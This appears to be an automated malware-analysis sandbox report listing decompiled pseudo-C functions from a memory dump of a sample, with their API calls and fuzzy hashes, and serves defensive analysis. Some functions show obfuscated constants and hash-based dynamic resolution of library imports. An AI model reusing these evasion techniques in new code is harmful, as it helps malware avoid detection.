    • Instruction ID: eb4c199515f8a05eb135c908f140036e211aead233034e5b42b912236314665a
    • Opcode Fuzzy Hash: 7ec293bc81744a985f2a5f1d127cebe3ff5312bd3e9af5c901c590fd1ba4bc8c
    • Instruction Fuzzy Hash: 40E092A7A442147BD21022AD7C46E7F675CFA86B69F090036FA0ED2302FCA1A94042F3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00812BB0(void* __eflags) {
    				char _v408;
    				intOrPtr* _t4;
    				signed short _t5;
    				signed int _t7;
    
    				_t4 = E0081F5C0(6, 0xaaf7240); // executed
    				_t5 = E00804290(0xf88e);
    				_t7 =  *_t4(_t5 & 0x0000ffff,  &_v408); // executed
    				return _t7 & 0xffffff00 | _t7 == 0x00000000;
    			}








    APIs
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Startup
    • String ID:
    • API String ID: 724789610-0
    • Opcode ID: c958bb3823b25758dc798c59fac922a99db7c9413a468369c5c6da285cfd7c18
    • Instruction ID: 8615c676fbe9f9dd69190c5b485b32d5d15c06262ad01d9234bee10065f87dc7
    • Opcode Fuzzy Hash: c958bb3823b25758dc798c59fac922a99db7c9413a468369c5c6da285cfd7c18
    • Instruction Fuzzy Hash: EED01261D4132427E62471B57D17EF63A5C9B01754F440071BE4CD51C2F855A96881E7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E008046C0(void* _a4) {
    				void* _t2;
    				char _t5;
    				void* _t6;
    
    				_t6 = _a4;
    				if(_t6 != 0) {
    					E0081F5C0(0, E00808AE0(0x3a824d9));
    					_t5 = RtlFreeHeap( *0x827a70, 0, _t6); // executed
    					return _t5;
    				}
    				return _t2;
    			}







    APIs
    • RtlFreeHeap.NTDLL(00000000,0080EF06,?,?,?), ref: 008046EC
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 91e47abc78055fe91fbe803411425838734150f729363bf1ff258a77cf8eeb4f
    • Instruction ID: d878d5bb934ee695d2c1fd6ed6765d3b1092c4753ae750f3fea76bf32e5a5318
    • Opcode Fuzzy Hash: 91e47abc78055fe91fbe803411425838734150f729363bf1ff258a77cf8eeb4f
    • Instruction Fuzzy Hash: E4D05E72A8523437E4502699AC03FAF3A0CFB12B65F080422BE0EE6582E982695001F3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00816780(void* __eax) {
    				void _v8;
    				int _t5;
    
    				_v8 = 0xa;
    				E0081F5C0(0x13, 0x5b4d601); // executed
    				_t5 = InternetSetOptionA(0, 0x49,  &_v8, 4); // executed
    				return _t5;
    			}






    APIs
    • InternetSetOptionA.WININET(00000000,00000049,0000000A,00000004), ref: 008167A4
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: InternetOption
    • String ID:
    • API String ID: 3327645240-0
    • Opcode ID: 02716467b8d7b749decfd02a65ed797f860bd8a26bab230bc97c0b72fbbe20e6
    • Instruction ID: 8334819f4513918a771b2c519bf348831c519c19b8b19f71a20663ef32684497
    • Opcode Fuzzy Hash: 02716467b8d7b749decfd02a65ed797f860bd8a26bab230bc97c0b72fbbe20e6
    • Instruction Fuzzy Hash: 41D0A9B0A803087AFA20DAC0AC03F8A329C9B10B28F000074B30DE91C1E5FA2714A5A7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00814650(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
    				char _t8;
    				signed int _t11;
    				void* _t13;
    				signed int _t14;
    				void* _t15;
    
    				if(_a8 == 0) {
    					L8:
    					return _t8;
    				}
    				_t11 = _a16 & 0x000000ff;
    				_t14 = _a12 & 0x000000ff;
    				_t13 = 0;
    				if(0 != 0) {
    					L5:
    					if(_a20 != 0 && 1 != 0) {
    						E0081F5C0(0, 0x7a2bc0);
    						_t15 = _t15 + 8;
    						Sleep(0x14); // executed
    					}
    					while(1) {
    						L3:
    						_t8 = E0081B4E0(_t14, _t11);
    						_t15 = _t15 + 8;
    						 *((char*)(_a4 + _t13)) = _t8;
    						_t13 = _t13 + 1;
    						if(_a8 == _t13) {
    							goto L8;
    						}
    						if(_t13 == 0) {
    							continue;
    						}
    						goto L5;
    					}
    					goto L8;
    				}
    				goto L3;
    			}

    APIs
    • Sleep.KERNEL32(00000014,?,?,00000000,00000010), ref: 008146A7
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Sleep
    • String ID:
    • API String ID: 3472027048-0
    • Opcode ID: b2bb87e1eea7e2a2963499cb02277e7a6a55a00e86a66b53296a0e73a55cde55
    • Instruction ID: b9810ba9991b56c91733d524b915f4c62042aca2cf094bfcd8c859204b947156
    • Opcode Fuzzy Hash: b2bb87e1eea7e2a2963499cb02277e7a6a55a00e86a66b53296a0e73a55cde55
    • Instruction Fuzzy Hash: 10F02BE540424925F7124E196C01BEB3B5CEFE379EF241025FD58C9282D2354DC2C7B1
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 87%
    			E0081F870(signed int _a4, intOrPtr _a8) {
    				CHAR* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				char _v136;
    				void* _t72;
    				void* _t77;
    				intOrPtr* _t80;
    				void* _t86;
    				void* _t90;
    				void* _t91;
    				void* _t94;
    				signed int _t98;
    				void* _t100;
    				signed char _t105;
    				signed int _t110;
    				void* _t111;
    				void* _t113;
    				void* _t114;
    				char _t117;
    				signed int _t118;
    				signed int _t125;
    				void* _t126;
    				intOrPtr _t129;
    				intOrPtr _t134;
    				intOrPtr _t135;
    				intOrPtr* _t137;
    				intOrPtr _t139;
    				void* _t140;
    				_Unknown_base(*)()* _t147;
    				char* _t148;
    				intOrPtr _t149;
    				CHAR* _t152;
    				signed char* _t153;
    				void* _t155;
    				void* _t156;
    				void* _t157;
    				void* _t158;
    				void* _t164;
    				void* _t166;
    				void* _t167;
    				void* _t172;
    				void* _t177;
    
    				_t118 = _a4;
    				_t147 = 0;
    				_t180 = _t118;
    				if(_t118 != 0) {
    					_t72 = E0081B420(_t180, _t118);
    					_t158 = _t157 + 4;
    					_t134 =  *((intOrPtr*)(_t72 + 0x60));
    					_t181 =  *((intOrPtr*)(_t134 + _t118 + 0x18));
    					if( *((intOrPtr*)(_t134 + _t118 + 0x18)) != 0) {
    						_v32 =  *((intOrPtr*)(_t72 + 0x64));
    						_t135 = _t134 + _t118;
    						_t148 = E00802640(0, E00806CC0(_t181, E00802640(0,  *((intOrPtr*)(_t135 + 0x24))),  ~_t118));
    						_v28 = _t135;
    						_t77 = E00802640(0,  *((intOrPtr*)(_t135 + 0x20)));
    						_t80 = E00802640(0, E00802640(0, _t118) + _t77);
    						_t164 = _t158 + 0x30;
    						_t137 = _t80;
    						_t129 = 0;
    						_t119 =  &_v136;
    						0;
    						0;
    						0;
    						do {
    							_v36 = _t129;
    							_v20 = _t148;
    							_t149 =  *_t137;
    							E00806CC0(0, _t149, _a4);
    							E0080AF10(_t119, 0x64);
    							_t166 = _t164 + 0x10;
    							_t85 =  *((intOrPtr*)(_t149 + _a4));
    							if( *((intOrPtr*)(_t149 + _a4)) != 0) {
    								_t155 = _t149 + _a4;
    								_t126 = 0;
    								do {
    									_t117 = E00804AE0(0, _t85);
    									_t166 = _t166 + 4;
    									 *((char*)(_t156 + _t126 - 0x84)) = _t117;
    									_t85 =  *(_t155 + _t126 + 1) & 0x000000ff;
    									_t126 = _t126 + 1;
    								} while (_t85 != 0);
    							}
    							_push(0xffffffff);
    							_t119 =  &_v136;
    							_t86 = E00808E60( &_v136);
    							_t167 = _t166 + 8;
    							if(_t86 == _a8) {
    								_t90 = E00806CC0(__eflags,  *((intOrPtr*)(_v28 + 0x1c)), _a4);
    								_t91 = E00808AE0(0xab29d786);
    								_t147 = E00808AE0(0xab29d786) +  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)) - _t91 + _a4;
    								_t139 = _v28;
    								E00806CC0(__eflags,  *((intOrPtr*)(_t90 + ( *_v20 & 0x0000ffff) * 4)), _a4);
    								_t94 = E00808AE0(0xea92e690);
    								_t172 = _t167 + 0x1c;
    								__eflags = _t147 - _t139;
    								if(_t147 > _t139) {
    									_t140 = _t139 - _t94;
    									_t38 = _v32 - 0x1d43e3e4; // -490988516
    									__eflags = _t147 - _t140 + _t38;
    									if(_t147 < _t140 + _t38) {
    										__eflags = 1;
    										if(1 != 0) {
    											_t98 =  *_t147;
    											__eflags = _t98 - 0x2e;
    											if(_t98 != 0x2e) {
    												_t125 = 0;
    												__eflags = 0;
    												do {
    													 *(_t156 + _t125 - 0x84) = _t98;
    													_t98 =  *(_t147 + _t125 + 1) & 0x000000ff;
    													_t125 = _t125 + 1;
    													__eflags = _t98 - 0x2e;
    												} while (_t98 != 0x2e);
    											}
    											_t44 = _t147 + 1; // 0x2
    											_v20 = 0 + _t44;
    											 *((short*)(_t156 + 0xffffffffffffff7c)) = 0x642e;
    											_t100 = E00808AE0(0x82efa8f);
    											E00808AE0(0x82efa8f);
    											 *((char*)(_t156 + 0xffffffffffffff7e)) = 0x6c;
    											E00808AE0(0x82efa88);
    											 *((char*)(_t156 + _t100 - 0x84)) = E008027A0(0xe0);
    											 *((char*)(_t156 + 0xffffffffffffff80)) = 0;
    											_v24 = 0;
    											_t105 = E008094A0( *(0 + _t147 + 1) & 0x000000ff, 0x23);
    											_t177 = _t172 + 0x18;
    											__eflags = _t105 & 0x00000001;
    											if((_t105 & 0x00000001) == 0) {
    												_t152 = _v20;
    											} else {
    												_t110 = _v20[1];
    												__eflags = _t110;
    												if(_t110 == 0) {
    													_t152 =  &_v24;
    												} else {
    													_t63 = _t147 + 3; // 0x4
    													_t153 = 0 + _t63;
    													do {
    														_t111 = E00808AE0(0x30866b89);
    														E00806CC0(__eflags, _t110, 0xffffffd0);
    														_t113 = E00802640(0, _v24 + _v24 + (_v24 + _v24) * 4);
    														_t177 = _t177 + 0x14;
    														_v24 = _t110 - _t111 - _t113 + 0x38a890d5;
    														_t110 =  *_t153 & 0x000000ff;
    														_t153 =  &(_t153[1]);
    														__eflags = _t110;
    													} while (_t110 != 0);
    													_t152 =  &_v24;
    												}
    											}
    											_t147 = GetProcAddress(LoadLibraryA( &_v136), _t152);
    										}
    									}
    								}
    							} else {
    								goto L7;
    							}
    							goto L23;
    							L7:
    							_t137 = _t137 + 4;
    							_t148 =  &(_v20[2]);
    							_t114 = E00802640(0, 1);
    							_t164 = _t167 + 8;
    							_t129 = _v36 - _t114;
    						} while (_t129 <  *((intOrPtr*)(_v28 + 0x18)));
    						_t147 = 0;
    					}
    				}
    				L23:
    				return _t147;
    			}

    APIs
    • LoadLibraryA.KERNEL32(0000642E), ref: 0081FB26
    • GetProcAddress.KERNEL32(00000000,?), ref: 0081FB2E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .d$l
    • API String ID: 2574300362-2610669624
    • Opcode ID: 3aa4616683255edeb566ab99bf56e8ea862b6c2c7247bcfff31106465dbe080c
    • Instruction ID: eb1c347fa50d395a30c02337f40a6af17cc1a2955b0877c22808fe9736ca1270
    • Opcode Fuzzy Hash: 3aa4616683255edeb566ab99bf56e8ea862b6c2c7247bcfff31106465dbe080c
    • Instruction Fuzzy Hash: 0A713BB6D001155BCB109FA8EC46BEE3B65FF15358F040074FA89E7383E6719A5587B2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0081FC90(void* __eax) {
    				char _v12;
    				void* _t5;
    
    				_t5 = CreateEventW(0, 1, 0, E0080F180(0x823ac4,  &_v12));
    				if(_t5 != 0) {
    					SetEvent(_t5);
    					_t5 = CloseHandle(_t5);
    				}
    				SetLastError(0);
    				return _t5;
    			}

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00808C29,?,?,?,?,00802BA8), ref: 0081FCAD
    • SetEvent.KERNEL32(00000000,?,00808C29,?,?,?,?,00802BA8,?,?,?,?,?,?,?,0080A1E6), ref: 0081FCBA
    • CloseHandle.KERNEL32(00000000,?,00808C29,?,?,?,?,00802BA8,?,?,?,?,?,?,?,0080A1E6), ref: 0081FCC1
    • SetLastError.KERNEL32(00000000,?,00808C29,?,?,?,?,00802BA8,?,?,?,?,?,?,?,0080A1E6), ref: 0081FCC9
    Memory Dump Source
    • Source File: 0000000E.00000002.554265003.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: true
    Similarity
    • API ID: Event$CloseCreateErrorHandleLast
    • String ID:
    • API String ID: 2055590504-0
    • Opcode ID: c4db36cea2b1e59a7b5bc49d9af322eb28750732ed13304920e8ac7b49824400
    • Instruction ID: dd5c32811c37ddedb98ba82b73686715a9a24d0e176ce968768f328aa4235d72
    • Opcode Fuzzy Hash: c4db36cea2b1e59a7b5bc49d9af322eb28750732ed13304920e8ac7b49824400
    • Instruction Fuzzy Hash: 7BE04F72A40614BBE62127A1BC1AFAA7A2CFF04796F044021FB0AD51C1DA59964586B6
    Uniqueness

    Uniqueness Score: -1.00%